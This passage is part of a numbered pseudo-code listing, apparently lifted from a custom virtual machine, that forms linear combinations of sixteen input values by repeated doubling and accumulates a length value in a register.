933 | r[3] = r[3] + r[8] 934 | r[8] = r[8] + r[8] 935 | r[8] = r[8] + r[8] 936 | r[8] = r[8] + r[8] 937 | r[3] = r[3] + r[8] 938 | r[8] = r[8] + r[8] 939 | r[2] = r[2] + r[3] 940 | r[0] = r[2] + 144 941 | r[4] = len(&r[0]) 942 | r[15] = r[15] + r[4] 943 | r[2] = 0 944 | r[3] = 0 945 | r[8] = i[0] 946 | r[3] = r[3] + r[8] 947 | r[8] = r[8] + r[8] 948 | r[8] = r[8] + r[8] 949 | r[3] = r[3] + r[8] 950 | r[8] = r[8] + r[8] 951 | r[8] = r[8] + r[8] 952 | r[8] = r[8] + r[8] 953 | r[8] = r[8] + r[8] 954 | r[3] = r[3] + r[8] 955 | r[8] = r[8] + r[8] 956 | r[3] = r[3] + r[8] 957 | r[8] = r[8] + r[8] 958 | r[2] = r[2] + r[3] 959 | r[3] = 0 960 | r[8] = i[1] 961 | r[3] = r[3] + r[8] 962 | r[8] = r[8] + r[8] 963 | r[8] = r[8] + r[8] 964 | r[8] = r[8] + r[8] 965 | r[8] = r[8] + r[8] 966 | r[3] = r[3] + r[8] 967 | r[8] = r[8] + r[8] 968 | r[3] = r[3] + r[8] 969 | r[8] = r[8] + r[8] 970 | r[3] = r[3] + r[8] 971 | r[8] = r[8] + r[8] 972 | r[3] = r[3] + r[8] 973 | r[8] = r[8] + r[8] 974 | r[2] = r[2] + r[3] 975 | r[3] = 0 976 | r[8] = i[2] 977 | r[3] = r[3] + r[8] 978 | r[8] = r[8] + r[8] 979 | r[8] = r[8] + r[8] 980 | r[8] = r[8] + r[8] 981 | r[8] = r[8] + r[8] 982 | r[3] = r[3] + r[8] 983 | r[8] = r[8] + r[8] 984 | r[3] = r[3] + r[8] 985 | r[8] = r[8] + r[8] 986 | r[8] = r[8] + r[8] 987 | r[3] = r[3] + r[8] 988 | r[8] = r[8] + r[8] 989 | r[2] = r[2] + r[3] 990 | r[3] = 0 991 | r[8] = i[3] 992 | r[3] = r[3] + r[8] 993 | r[8] = r[8] + r[8] 994 | r[3] = r[3] + r[8] 995 | r[8] = r[8] + r[8] 996 | r[8] = r[8] + r[8] 997 | r[3] = r[3] + r[8] 998 | r[8] = r[8] + r[8] 999 | r[8] = r[8] + r[8] 1000 | r[8] = r[8] + r[8] 1001 | r[3] = r[3] + r[8] 1002 | r[8] = r[8] + r[8] 1003 | r[2] = r[2] + r[3] 1004 | r[3] = 0 1005 | r[8] = i[4] 1006 | r[3] = r[3] + r[8] 1007 | r[8] = r[8] + r[8] 1008 | r[3] = r[3] + r[8] 1009 | r[8] = r[8] + r[8] 1010 | r[8] = r[8] + r[8] 1011 | r[3] = r[3] + r[8] 1012 | r[8] = r[8] + r[8] 1013 | r[8] = r[8] + r[8] 1014 | r[3] = r[3] + r[8] 1015 | r[8] = r[8] + r[8] 1016 | r[3] = r[3] + r[8] 1017 | r[8] = r[8] + r[8] 1018 | r[2] = r[2] + r[3] 1019 | r[3] = 0 1020 | r[8] = i[5] 1021 | r[8] = r[8] + r[8] 1022 | r[8] = r[8] + r[8] 1023 | r[3] = r[3] + r[8] 1024 | r[8] = r[8] + r[8] 1025 | r[3] = r[3] + r[8] 1026 | r[8] = r[8] + r[8] 1027 | r[8] = r[8] + r[8] 1028 | r[8] = r[8] + r[8] 1029 | r[3] = r[3] + r[8] 1030 | r[8] = r[8] + r[8] 1031 | r[2] = r[2] + r[3] 1032 | r[3] = 0 1033 | r[8] = i[6] 1034 | r[8] = r[8] + r[8] 1035 | r[8] = r[8] + r[8] 1036 | r[3] = r[3] + r[8] 1037 | r[8] = r[8] + r[8] 1038 | r[8] = r[8] + r[8] 1039 | r[8] = r[8] + r[8] 1040 | r[8] = r[8] + r[8] 1041 | r[3] = r[3] + r[8] 1042 | r[8] = r[8] + r[8] 1043 | r[2] = r[2] + r[3] 1044 | r[3] = 0 1045 | r[8] = i[7] 1046 | r[8] = r[8] + r[8] 1047 | r[8] = r[8] + r[8] 1048 | r[8] = r[8] + r[8] 1049 | r[8] = r[8] + r[8] 1050 | r[3] = r[3] + r[8] 1051 | r[8] = r[8] + r[8] 1052 | r[8] = r[8] + r[8] 1053 | r[3] = r[3] + r[8] 1054 | r[8] = r[8] + r[8] 1055 | r[3] = r[3] + r[8] 1056 | r[8] = r[8] + r[8] 1057 | r[2] = r[2] + r[3] 1058 | r[3] = 0 1059 | r[8] = i[8] 1060 | r[8] = r[8] + r[8] 1061 | r[3] = r[3] + r[8] 1062 | r[8] = r[8] + r[8] 1063 | r[3] = r[3] + r[8] 1064 | r[8] = r[8] + r[8] 1065 | r[8] = r[8] + r[8] 1066 | r[8] = r[8] + r[8] 1067 | r[3] = r[3] + r[8] 1068 | r[8] = r[8] + r[8] 1069 | r[3] = r[3] + r[8] 1070 | r[8] = r[8] + r[8] 1071 | r[2] = r[2] + r[3] 1072 | r[3] = 0 1073 | r[8] = i[9] 1074 | r[8] = r[8] + r[8] 1075 | r[3] = r[3] + r[8] 1076 | r[8] = r[8] + r[8] 1077 | r[3] = r[3] + r[8] 1078 | r[8] = r[8] + r[8] 1079 | r[3] = r[3] + r[8] 1080 | r[8] = r[8] + r[8] 1081 | r[8] = r[8] + r[8] 1082 | r[3] = r[3] + r[8] 1083 | r[8] = r[8] + r[8] 1084 | r[3] = r[3] + r[8] 1085 | r[8] = r[8] + r[8] 1086 | r[2] = r[2] + r[3] 1087 | r[3] = 0 1088 | r[8] = i[10] 1089 | r[8] = r[8] + r[8] 1090 | r[3] = r[3] + r[8] 1091 | r[8] = r[8] + r[8] 1092 | r[8] = r[8] + r[8] 1093 | r[3] = r[3] + r[8] 1094 | r[8] = r[8] + r[8] 1095 | r[3] = r[3] + r[8] 1096 | r[8] = r[8] + r[8] 1097 | r[2] = r[2] + r[3] 1098 | r[3] = 0 1099 | r[8] = i[11] 1100 | r[3] = r[3] + r[8] 1101 | r[8] = r[8] + r[8] 1102 | r[3] = r[3] + r[8] 1103 | r[8] = r[8] + r[8] 1104 | r[8] = r[8] + r[8] 1105 | r[8] = r[8] + r[8] 1106 | r[3] = r[3] + r[8] 1107 | r[8] = r[8] + r[8] 1108 | r[8] = r[8] + r[8] 1109 | r[3] = r[3] + r[8] 1110 | r[8] = r[8] + r[8] 1111 | r[2] = r[2] + r[3] 1112 | r[3] = 0 1113 | r[8] = i[12] 1114 | r[3] = r[3] + r[8] 1115 | r[8] = r[8] + r[8] 1116 | r[8] = r[8] + r[8] 1117 | r[8] = r[8] + r[8] 1118 | r[8] = r[8] + r[8] 1119 | r[3] = r[3] + r[8] 1120 | r[8] = r[8] + r[8] 1121 | r[2] = r[2] + r[3] 1122 | r[3] = 0 1123 | r[8] = i[13] 1124 | r[8] = r[8] + r[8] 1125 | r[3] = r[3] + r[8] 1126 | r[8] = r[8] + r[8] 1127 | r[8] = r[8] + r[8] 1128 | r[3] = r[3] + r[8] 1129 | r[8] = r[8] + r[8] 1130 | r[3] = r[3] + r[8] 1131 | r[8] = r[8] + r[8] 1132 | r[2] = r[2] + r[3] 1133 | r[3] = 0 1134 | r[8] = i[14] 1135 | r[3] = r[3] + r[8] 1136 | r[8] = r[8] + r[8] 1137 | r[8] = r[8] + r[8] 1138 | r[8] = r[8] + r[8] 1139 | r[3] = r[3] + r[8] 1140 | r[8] = r[8] + r[8] 1141 | r[3] = r[3] + r[8] 1142 | r[8] = r[8] + r[8] 1143 | r[3] = r[3] + r[8] 1144 | r[8] = r[8] + r[8] 1145 | r[2] = r[2] + r[3] 1146 | r[3] = 0 1147 | r[8] = i[15] 1148 | r[3] = r[3] + r[8] 1149 | r[8] = r[8] + r[8] 1150 | r[3] = r[3] + r[8] 1151 | r[8] = r[8] + r[8] 1152 | r[3] = r[3] + r[8] 1153 | r[8] = r[8] + r[8] 1154 | r[3] = r[3] + r[8] 1155 | r[8] = r[8] + r[8] 1156 | r[3] = r[3] + r[8] 1157 | r[8] = r[8] + r[8] 1158 | r[3] = r[3] + r[8] 1159 | r[8] = r[8] + r[8] 1160 | r[2] = r[2] + r[3] 1161 | r[0] = r[2] + 92 1162 | r[4] = len(&r[0]) 1163 | r[15] = r[15] + r[4] 1164 | r[2] = 0 1165 | r[3] = 0 1166 | r[8] = i[0] 1167 | r[3] = r[3] + r[8] 1168 | r[8] = r[8] + r[8] 1169 | r[8] = r[8] + r[8] 1170 | r[3] = r[3] + r[8] 1171 | r[8] = r[8] + r[8] 1172 | r[3] = r[3] + r[8] 1173 | r[8] = r[8] + r[8] 1174 | r[8] = r[8] + r[8] 1175 | r[8] = r[8] + r[8] 1176 | r[3] = r[3] + r[8] 1177 | r[8] = r[8] + r[8] 1178 | r[3] = r[3] + r[8] 1179 | r[8] = r[8] + r[8] 1180 | r[2] = r[2] + r[3] 1181 | r[3] = 0 1182 | r[8] = i[1] 1183 | r[8] = r[8] + r[8] 1184 | r[8] = r[8] + r[8] 1185 | r[3] = r[3] + r[8] 1186 | r[8] = r[8] + r[8] 1187 | r[8] = r[8] + r[8] 1188 | r[3] = r[3] + r[8] 1189 | r[8] = r[8] + r[8] 1190 | r[8] = r[8] + r[8] 1191 | r[8] = r[8] + r[8] 1192 | r[3] = r[3] + r[8] 1193 | r[8] = r[8] + r[8] 1194 | r[2] = r[2] + r[3] 1195 | r[3] = 0 1196 | r[8] = i[2] 1197 | r[3] = r[3] + r[8] 1198 | r[8] = r[8] + r[8] 1199 | r[8] = r[8] + r[8] 1200 | r[8] = r[8] + r[8] 1201 | r[8] = r[8] + r[8] 1202 | r[3] = r[3] + r[8] 1203 | r[8] = r[8] + r[8] 1204 | r[8] = r[8] + r[8] 1205 | r[3] = r[3] + r[8] 1206 | r[8] = r[8] + r[8] 1207 | r[3] = r[3] + r[8] 1208 | r[8] = r[8] + r[8] 1209 | r[2] = r[2] + r[3] 1210 | r[3] = 0 1211 | r[8] = i[3] 1212 | r[8] = r[8] + r[8] 1213 | r[8] = r[8] + r[8] 1214 | r[8] = r[8] + r[8] 1215 | r[3] = r[3] + r[8] 1216 | r[8] = r[8] + r[8] 1217 | r[3] = r[3] + r[8] 1218 | r[8] = r[8] + r[8] 1219 | r[3] = r[3] + r[8] 1220 | r[8] = r[8] + r[8] 1221 | r[3] = r[3] + r[8] 1222 | r[8] = r[8] + r[8] 1223 | r[3] = r[3] + r[8] 1224 | r[8] = r[8] + r[8] 1225 | r[2] = r[2] + r[3] 1226 | r[3] = 0 1227 | r[8] = i[4] 1228 | r[8] = r[8] + r[8] 1229 | r[3] = r[3] + r[8] 1230 | r[8] = r[8] + r[8] 1231 | r[8] = r[8] + r[8] 1232 | r[8] = r[8] + r[8] 1233 | r[3] = r[3] + r[8] 1234 | r[8] = r[8] + r[8] 1235 | r[2] = r[2] + r[3] 1236 | r[3] = 0 1237 | r[8] = i[5] 1238 | r[8] = r[8] + r[8] 1239 | r[3] = r[3] + r[8] 1240 | r[8] = r[8] + r[8] 1241 | r[3] = r[3] + r[8] 1242 | r[8] = r[8] + r[8] 1243 | r[3] = r[3] + r[8] 1244 | r[8] = r[8] + r[8] 1245 | r[8] = r[8] + r[8] 1246 | r[8] = r[8] + r[8] 1247 | r[8] = r[8] + r[8] 1248 | r[3] = r[3] + r[8] 1249 | r[8] = r[8] + r[8] 1250 | r[2] = r[2] + r[3] 1251 | r[3] = 0 1252 | r[8] = i[6] 1253 | r[3] = r[3] + r[8] 1254 | r[8] = r[8] + r[8] 1255 | r[3] = r[3] + r[8] 1256 | r[8] = r[8] + r[8] 1257 | r[8] = r[8] + r[8] 1258 | r[8] = r[8] + r[8] 1259 | r[8] = r[8] + r[8] 1260 | r[8] = r[8] + r[8] 1261 | r[3] = r[3] + r[8] 1262 | r[8] = r[8] + r[8] 1263 | r[2] = r[2] + r[3] 1264 | r[3] = 0 1265 | r[8] = i[7] 1266 | r[3] = r[3] + r[8] 1267 | r[8] = r[8] + r[8] 1268 | r[8] = r[8] + r[8] 1269 | r[3] = r[3] + r[8] 1270 | r[8] = r[8] + r[8] 1271 | r[8] = r[8] + r[8] 1272 | r[3] = r[3] + r[8] 1273 | r[8] = r[8] + r[8] 1274 | r[3] = r[3] + r[8] 1275 | r[8] = r[8] + r[8] 1276 | r[2] = r[2] + r[3] 1277 | r[3] = 0 1278 | r[8] = i[8] 1279 | r[8] = r[8] + r[8] 1280 | r[8] = r[8] + r[8] 1281 | r[8] = r[8] + r[8] 1282 | r[8] = r[8] + r[8] 1283 | r[3] = r[3] + r[8] 1284 | r[8] = r[8] + r[8] 1285 | r[8] = r[8] + r[8] 1286 | r[3] = r[3] + r[8] 1287 | r[8] = r[8] + r[8] 1288 | r[2] = r[2] + r[3] 1289 | r[3] = 0 1290 | r[8] = i[9] 1291 | r[8] = r[8] + r[8] 1292 | r[3] = r[3] + r[8] 1293 | r[8] = r[8] + r[8] 1294 | r[3] = r[3] + r[8] 1295 | r[8] = r[8] + r[8] 1296 | r[3] = r[3] + r[8] 1297 | r[8] = r[8] + r[8] 1298 | r[8] = r[8] + r[8] 1299 | r[3] = r[3] + r[8] 1300 | r[8] = r[8] + r[8] 1301 | r[8] = r[8] + r[8] 1302 | r[3] = r[3] + r[8] 1303 | r[8] = r[8] + r[8] 1304 | r[2] = r[2] + r[3] 1305 | r[3] = 0 1306 | r[8] = i[10] 1307 | r[3] = r[3] + r[8] 1308 | r[8] = r[8] + r[8] 1309 | r[3] = r[3] + r[8] 1310 | r[8] = r[8] + r[8] 1311 | r[8] = r[8] + r[8] 1312 | r[3] = r[3] + r[8] 1313 | r[8] = r[8] + r[8] 1314 | r[3] = r[3] + r[8] 1315 | r[8] = r[8] + r[8] 1316 | r[3] = r[3] + r[8] 1317 | r[8] = r[8] + r[8] 1318 | r[3] = r[3] + r[8] 1319 | r[8] = r[8] + r[8] 1320 | r[2] = r[2] + r[3] 1321 | r[3] = 0 1322 | r[8] = i[11] 1323 | r[8] = r[8] + r[8] 1324 | r[3] = r[3] + r[8] 1325 | r[8] = r[8] + r[8] 1326 | r[8] = r[8] + r[8] 1327 | r[8] = r[8] + r[8] 1328 | r[8] = r[8] + r[8] 1329 | r[8] = r[8] + r[8] 1330 | r[3] = r[3] + r[8] 1331 | r[8] = r[8] + r[8] 1332 | r[3] = r[3] + r[8] 1333 | r[8] = r[8] + r[8] 1334 | r[2] = r[2] + r[3] 1335 | r[3] = 0 1336 | r[8] = i[12] 1337 | r[3] = r[3] + r[8] 1338 | r[8] = r[8] + r[8] 1339 | r[8] = r[8] + r[8] 1340 | r[8] = r[8] + r[8] 1341 | r[3] = r[3] + r[8] 1342 | r[8] = r[8] + r[8] 1343 | r[8] = r[8] + r[8] 1344 | r[8] = r[8] + r[8] 1345 | r[3] = r[3] + r[8] 1346 | r[8] = r[8] + r[8] 1347 | r[3] = r[3] + r[8] 1348 | r[8] = r[8] + r[8] 1349 | r[2] = r[2] + r[3] 1350 | r[3] = 0 1351 | r[8] = i[13] 1352 | r[3] = r[3] + r[8] 1353 | r[8] = r[8] + r[8] 1354 | r[3] = r[3] + r[8] 1355 | r[8] = r[8] + r[8] 1356 | r[3] = r[3] + r[8] 1357 | r[8] = r[8] + r[8] 1358 | r[3] = r[3] + r[8] 1359 | r[8] = r[8] + r[8] 1360 | r[3] = r[3] + r[8] 1361 | r[8] = r[8] + r[8] 1362 | r[8] = r[8] + r[8] 1363 | r[3] = r[3] + r[8] 1364 | r[8] = r[8] + r[8] 1365 | r[3] = r[3] + r[8] 1366 | r[8] = r[8] + r[8] 1367 | r[2] = r[2] + r[3] 1368 | r[3] = 0 1369 | r[8] = i[14] 1370 | r[8] = r[8] + r[8] 1371 | r[8] = r[8] + r[8] 1372 | r[3] = r[3] + r[8] 1373 | r[8] = r[8] + r[8] 1374 | r[8] = r[8] + r[8] 1375 | r[3] = r[3] + r[8] 1376 | r[8] = r[8] + r[8] 1377 | r[8] = r[8] + r[8] 1378 | r[3] = r[3] + r[8] 1379 | r[8] = r[8] + r[8] 1380 | r[2] = r[2] + r[3] 1381 | r[3] = 0 1382 | r[8] = i[15] 1383 | r[3] = r[3] + r[8] 1384 | r[8] = r[8] + r[8] 1385 | r[3] = r[3] + r[8] 1386 | r[8] = r[8] + r[8] 1387 | r[3] = r[3] + r[8] 1388 | r[8] = r[8] + r[8] 1389 | r[3] = r[3] + r[8] 1390 | r[8] = r[8] + r[8] 1391 | r[8] = r[8] + r[8] 1392 | r[3] = r[3] + r[8] 1393 | r[8] = r[8] + r[8] 1394 | r[2] = r[2] + r[3] 1395 | r[0] = r[2] + 206 1396 | r[4] = len(&r[0]) 1397 | r[15] = r[15] + r[4] 1398 | r[2] = 0 1399 | r[3] = 0 1400 | r[8] = i[0] 1401 | r[8] = r[8] + r[8] 1402 | r[8] = r[8] + r[8] 1403 | r[3] = r[3] + r[8] 1404 | r[8] = r[8] + r[8] 1405 | r[8] = r[8] + r[8] 1406 | r[8] = r[8] + r[8] 1407 | r[8] = r[8] + r[8] 1408 | r[3] = r[3] + r[8] 1409 | r[8] = r[8] + r[8] 1410 | r[2] = r[2] + r[3] 1411 | r[3] = 0 1412 | r[8] = i[1] 1413 | r[8] = r[8] + r[8] 1414 | r[8] = r[8] + r[8] 1415 | r[8] = r[8] + r[8] 1416 | r[3] = r[3] + r[8] 1417 | r[8] = r[8] + r[8] 1418 | r[3] = r[3] + r[8] 1419 | r[8] = r[8] + r[8] 1420 | r[3] = r[3] + r[8] 1421 | r[8] = r[8] + r[8] 1422 | r[3] = r[3] + r[8] 1423 | r[8] = r[8] + r[8] 1424 | r[2] = r[2] + r[3] 1425 | r[3] = 0 1426 | r[8] = i[2] 1427 | r[3] = r[3] + r[8] 1428 | r[8] = r[8] + r[8] 1429 | r[8] = r[8] + r[8] 1430 | r[8] = r[8] + r[8] 1431 | r[3] = r[3] + r[8] 1432 | r[8] = r[8] + r[8] 1433 | r[3] = r[3] + r[8] 1434 | r[8] = r[8] + r[8] 1435 | r[8] = r[8] + r[8] 1436 | r[3] = r[3] + r[8] 1437 | r[8] = r[8] + r[8] 1438 | r[2] = r[2] + r[3] 1439 | r[3] = 0 1440 | r[8] = i[3] 1441 | r[8] = r[8] + r[8] 1442 | r[8] = r[8] + r[8] 1443 | r[8] = r[8] + r[8] 1444 | r[8] = r[8] + r[8] 1445 | r[8] = r[8] + r[8] 1446 | r[3] = r[3] + r[8] 1447 | r[8] = r[8] + r[8] 1448 | r[3] = r[3] + r[8] 1449 | r[8] = r[8] + r[8] 1450 | r[2] = r[2] + r[3] 1451 | r[3] = 0 1452 | r[8] = i[4] 1453 | r[3] = r[3] + r[8] 1454 | r[8] = r[8] + r[8] 1455 | r[8] = r[8] + r[8] 1456 | r[8] = r[8] + r[8] 1457 | r[3] = r[3] + r[8] 1458 | r[8] = r[8] + r[8] 1459 | r[3] = r[3] + r[8] 1460 | r[8] = r[8] + r[8] 1461 | r[8] = r[8] + r[8] 1462 | r[8] = r[8] + r[8] 1463 | r[3] = r[3] + r[8] 1464 | r[8] = r[8] + r[8] 1465 | r[2] = r[2] + r[3] 1466 | r[3] = 0 1467 | r[8] = i[5] 1468 | r[3] = r[3] + r[8] 1469 | r[8] = r[8] + r[8] 1470 | r[8] = r[8] + r[8] 1471 | r[3] = r[3] + r[8] 1472 | r[8] = r[8] + r[8] 1473 | r[3] = r[3] + r[8] 1474 | r[8] = r[8] + r[8] 1475 | r[3] = r[3] + r[8] 1476 | r[8] = r[8] + r[8] 1477 | r[2] = r[2] + r[3] 1478 | r[3] = 0 1479 | r[8] = i[6] 1480 | r[3] = r[3] + r[8] 1481 | r[8] = r[8] + r[8] 1482 | r[8] = r[8] + r[8] 1483 | r[3] = r[3] + r[8] 1484 | r[8] = r[8] + r[8] 1485 | r[8] = r[8] + r[8] 1486 | r[8] = r[8] + r[8] 1487 | r[3] = r[3] + r[8] 1488 | r[8] = r[8] + r[8] 1489 | r[2] = r[2] + r[3] 1490 | r[3] = 0 1491 | r[8] = i[7] 1492 | r[8] = r[8] + r[8] 1493 | r[3] = r[3] + r[8] 1494 | r[8] = r[8] + r[8] 1495 | r[8] = r[8] + r[8] 1496 | r[3] = r[3] + r[8] 1497 | r[8] = r[8] + r[8] 1498 | r[3] = r[3] + r[8] 1499 | r[8] = r[8] + r[8] 1500 | r[8] = r[8] + r[8] 1501 | r[3] = r[3] + r[8] 1502 | r[8] = r[8] + r[8] 1503 | r[3] = r[3] + r[8] 1504 | r[8] = r[8] + r[8] 1505 | r[2] = r[2] + r[3] 1506 | r[3] = 0 1507 | r[8] = i[8] 1508 | r[3] = r[3] + r[8] 1509 | r[8] = r[8] + r[8] 1510 | r[8] = r[8] + r[8] 1511 | r[3] = r[3] + r[8] 1512 | r[8] = r[8] + r[8] 1513 | r[8] = r[8] + r[8] 1514 | r[8] = r[8] + r[8] 1515 | r[3] = r[3] + r[8] 1516 | r[8] = r[8] + r[8] 1517 | r[3] = r[3] + r[8] 1518 | r[8] = r[8] + r[8] 1519 | r[2] = r[2] + r[3] 1520 | r[3] = 0 1521 | r[8] = i[9] 1522 | r[3] = r[3] + r[8] 1523 | r[8] = r[8] + r[8] 1524 | r[8] = r[8] + r[8] 1525 | r[3] = r[3] + r[8] 1526 | r[8] = r[8] + r[8] 1527 | r[8] = r[8] + r[8] 1528 | r[3] = r[3] + r[8] 1529 | r[8] = r[8] + r[8] 1530 | r[3] = r[3] + r[8] 1531 | r[8] = r[8] + r[8] 1532 | r[3] = r[3] + r[8] 1533 | r[8] = r[8] + r[8] 1534 | r[2] = r[2] + r[3] 1535 | r[3] = 0 1536 | r[8] = i[10] 1537 | r[8] = r[8] + r[8] 1538 | r[8] = r[8] + r[8] 1539 | r[8] = r[8] + r[8] 1540 | r[3] = r[3] + r[8] 1541 | r[8] = r[8] + r[8] 1542 | r[3] = r[3] + r[8] 1543 | r[8] = r[8] + r[8] 1544 | r[3] = r[3] + r[8] 1545 | r[8] = r[8] + r[8] 1546 | r[3] = r[3] + r[8] 1547 | r[8] = r[8] + r[8] 1548 | r[3] = r[3] + r[8] 1549 | r[8] = r[8] + r[8] 1550 | r[2] = r[2] + r[3] 1551 | r[3] = 0 1552 | r[8] = i[11] 1553 | r[3] = r[3] + r[8] 1554 | r[8] = r[8] + r[8] 1555 | r[8] = r[8] + r[8] 1556 | r[8] = r[8] + r[8] 1557 | r[8] = r[8] + r[8] 1558 | r[8] = r[8] + r[8] 1559 | r[8] = r[8] + r[8] 1560 | r[3] = r[3] + r[8] 1561 | r[8] = r[8] + r[8] 1562 | r[2] = r[2] + r[3] 1563 | r[3] = 0 1564 | r[8] = i[12] 1565 | r[8] = r[8] + r[8] 1566 | r[8] = r[8] + r[8] 1567 | r[3] = r[3] + r[8] 1568 | r[8] = r[8] + r[8] 1569 | r[3] = r[3] + r[8] 1570 | r[8] = r[8] + r[8] 1571 | r[8] = r[8] + r[8] 1572 | r[8] = r[8] + r[8] 1573 | r[8] = r[8] + r[8] 1574 | r[3] = r[3] + r[8] 1575 | r[8] = r[8] + r[8] 1576 | r[2] = r[2] + r[3] 1577 | r[3] = 0 1578 | r[8] = i[13] 1579 | r[3] = r[3] + r[8] 1580 | r[8] = r[8] + r[8] 1581 | r[3] = r[3] + r[8] 1582 | r[8] = r[8] + r[8] 1583 | r[8] = r[8] + r[8] 1584 | r[3] = r[3] + r[8] 1585 | r[8] = r[8] + r[8] 1586 | r[8] = r[8] + r[8] 1587 | r[3] = r[3] + r[8] 1588 | r[8] = r[8] + r[8] 1589 | r[2] = r[2] + r[3] 1590 | r[3] = 0 1591 | r[8] = i[14] 1592 | r[3] = r[3] + r[8] 1593 | r[8] = r[8] + r[8] 1594 | r[3] = r[3] + r[8] 1595 | r[8] = r[8] + r[8] 1596 | r[3] = r[3] + r[8] 1597 | r[8] = r[8] + r[8] 1598 | r[3] = r[3] + r[8] 1599 | r[8] = r[8] + r[8] 1600 | r[8] = r[8] + r[8] 1601 | r[3] = r[3] + r[8] 1602 | r[8] = r[8] + r[8] 1603 | r[3] = r[3] + r[8] 1604 | r[8] = r[8] + r[8] 1605 | r[3] = r[3] + r[8] 1606 | r[8] = r[8] + r[8] 1607 | r[2] = r[2] + r[3] 1608 | r[3] = 0 1609 | r[8] = i[15] 1610 | r[8] = r[8] + r[8] 1611 | r[3] = r[3] + r[8] 1612 | r[8] = r[8] + r[8] 1613 | r[8] = r[8] + r[8] 1614 | r[3] = r[3] + r[8] 1615 | r[8] = r[8] + r[8] 1616 | r[8] = r[8] + r[8] 1617 | r[3] = r[3] + r[8] 1618 | r[8] = r[8] + r[8] 1619 | r[3] = r[3] + r[8] 1620 | r[8] = r[8] + r[8] 1621 | r[2] = r[2] + r[3] 1622 | r[0] = r[2] + 205 1623 | r[4] = len(&r[0]) 1624 | r[15] = r[15] + r[4] 1625 | r[2] = 0 1626 | r[3] = 0 1627 | r[8] = i[0] 1628 | r[8] = r[8] + r[8] 1629 | r[3] = r[3] + r[8] 1630 | r[8] = r[8] + r[8] 1631 | r[3] = r[3] + r[8] 1632 | r[8] = r[8] + r[8] 1633 | r[3] = r[3] + r[8] 1634 | r[8] = r[8] + r[8] 1635 | r[2] = r[2] + r[3] 1636 | r[3] = 0 1637 | r[8] = i[1] 1638 | r[8] = r[8] + r[8] 1639 | r[3] = r[3] + r[8] 1640 | r[8] = r[8] + r[8] 1641 | r[8] = r[8] + r[8] 1642 | r[3] = r[3] + r[8] 1643 | r[8] = r[8] + r[8] 1644 | r[3] = r[3] + r[8] 1645 | r[8] = r[8] + r[8] 1646 | r[8] = r[8] + r[8] 1647 | r[3] = r[3] + r[8] 1648 | r[8] = r[8] + r[8] 1649 | r[3] = r[3] + r[8] 1650 | r[8] = r[8] + r[8] 1651 | r[2] = r[2] + r[3] 1652 | r[3] = 0 1653 | r[8] = i[2] 1654 | r[8] = r[8] + r[8] 1655 | r[8] = r[8] + r[8] 1656 | r[3] = r[3] + r[8] 1657 | r[8] = r[8] + r[8] 1658 | r[3] = r[3] + r[8] 1659 | r[8] = r[8] + r[8] 1660 | r[3] = r[3] + r[8] 1661 | r[8] = r[8] + r[8] 1662 | r[8] = r[8] + r[8] 1663 | r[3] = r[3] + r[8] 1664 | r[8] = r[8] + r[8] 1665 | r[2] = r[2] + r[3] 1666 | r[3] = 0 1667 | r[8] = i[3] 1668 | r[3] = r[3] + r[8] 1669 | r[8] = r[8] + r[8] 1670 | r[3] = r[3] + r[8] 1671 | r[8] = r[8] + r[8] 1672 | r[8] = r[8] + r[8] 1673 | r[3] = r[3] + r[8] 1674 | r[8] = r[8] + r[8] 1675 | r[3] = r[3] + r[8] 1676 | r[8] = r[8] + r[8] 1677 | r[3] = r[3] + r[8] 1678 | r[8] = r[8] + r[8] 1679 | r[3] = r[3] + r[8] 1680 | r[8] = r[8] + r[8] 1681 | r[3] = r[3] + r[8] 1682 | r[8] = r[8] + r[8] 1683 | r[2] = r[2] + r[3] 1684 | r[3] = 0 1685 | r[8] = i[4] 1686 | r[3] = r[3] + r[8] 1687 | r[8] = r[8] + r[8] 1688 | r[3] = r[3] + r[8] 1689 | r[8] = r[8] + r[8] 1690 | r[8] = r[8] + r[8] 1691 | r[3] = r[3] + r[8] 1692 | r[8] = r[8] + r[8] 1693 | r[3] = r[3] + r[8] 1694 | r[8] = r[8] + r[8] 1695 | r[8] = r[8] + r[8] 1696 | r[3] = r[3] + r[8] 1697 | r[8] = r[8] + r[8] 1698 | r[2] = r[2] + r[3] 1699 | r[3] = 0 1700 | r[8] = i[5] 1701 | r[3] = r[3] + r[8] 1702 | r[8] = r[8] + r[8] 1703 | r[8] = r[8] + r[8] 1704 | r[3] = r[3] + r[8] 1705 | r[8] = r[8] + r[8] 1706 | r[3] = r[3] + r[8] 1707 | r[8] = r[8] + r[8] 1708 | r[3] = r[3] + r[8] 1709 | r[8] = r[8] + r[8] 1710 | r[2] = r[2] + r[3] 1711 | r[3] = 0 1712 | r[8] = i[6] 1713 | r[3] = r[3] + r[8] 1714 | r[8] = r[8] + r[8] 1715 | r[3] = r[3] + r[8] 1716 | r[8] = r[8] + r[8] 1717 | r[8] = r[8] + r[8] 1718 | r[3] = r[3] + r[8] 1719 | r[8] = r[8] + r[8] 1720 | r[3] = r[3] + r[8] 1721 | r[8] = r[8] + r[8] 1722 | r[8] = r[8] + r[8] 1723 | r[8] = r[8] + r[8] 1724 | r[3] = r[3] + r[8] 1725 | r[8] = r[8] + r[8] 1726 | r[2] = r[2] + r[3] 1727 | r[3] = 0 1728 | r[8] = i[7] 1729 | r[8] = r[8] + r[8] 1730 | r[8] = r[8] + r[8] 1731 | r[8] = r[8] + r[8] 1732 | r[8] = r[8] + r[8] 1733 | r[3] = r[3] + r[8] 1734 | r[8] = r[8] + r[8] 1735 | r[2] = r[2] + r[3] 1736 | r[3] = 0 1737 | r[8] = i[8] 1738 | r[3] = r[3] + r[8] 1739 | r[8] = r[8] + r[8] 1740 | r[3] = r[3] + r[8] 1741 | r[8] = r[8] + r[8] 1742 | r[3] = r[3] + r[8] 1743 | r[8] = r[8] + r[8] 1744 | r[3] = r[3] + r[8] 1745 | r[8] = r[8] + r[8] 1746 | r[3] = r[3] + r[8] 1747 | r[8] = r[8] + r[8] 1748 | r[2] = r[2] + r[3] 1749 | r[3] = 0 1750 | r[8] = i[9] 1751 | r[3] = r[3] + r[8] 1752 | r[8] = r[8] + r[8] 1753 | r[2] = r[2] + r[3] 1754 | r[3] = 0 1755 | r[8] = i[10] 1756 | r[8] = r[8] + r[8] 1757 | r[3] = r[3] + r[8] 1758 | r[8] = r[8] + r[8] 1759 | r[3] = r[3] + r[8] 1760 | r[8] = r[8] + r[8] 1761 | r[8] = r[8] + r[8] 1762 | r[3] = r[3] + r[8] 1763 | r[8] = r[8] + r[8] 1764 | r[3] = r[3] + r[8] 1765 | 